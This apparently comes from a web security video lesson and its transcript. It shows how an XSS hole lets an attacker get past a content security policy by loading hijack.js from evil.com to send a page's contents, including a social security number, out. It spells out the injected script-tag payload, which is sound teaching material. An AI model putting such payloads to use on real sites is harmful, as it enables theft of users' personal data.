Read Document Content from a Vulnerable Website via Script Tag Injection in an XSS Payload

Mike Sherov
InstructorMike Sherov
Share this video with your friends

Social Share Links

Send Tweet

In this lesson, you will learn how to exploit an XSS vulnerability to read the contents of the page body from a vulnerable site, this time by loading up a script from their attacking domain instead of inlining the javascript, using an attack known as Remote Script Tag Injection. This attack will succeed because in the previous lesson, we only blocked inline scripts from executing. We'll solve this problem in our next lesson!

Instructor: [00:00] Now that we mitigated XSS via inline script injection, let's put our attacker hat back on. If we inspect the content security policy of the site, we see that it allows scripts from self and from HTTPS.

[00:12] We could take our malicious payload, strip the script tags and save this as a new file. Let's call it hijack.js. This file will now be available for download.

[00:33] If we logged back in to our site and we've put into the message box script source = https://evil.com:666/hijack.js and hit submit, we see that hijack.js gets included, which will create the image and cause our hijacked payload to be submitted.

[01:01] You can verify that the server has received the user's social security number again, thereby completing the XSS attack via a technique known as remote script inclusion.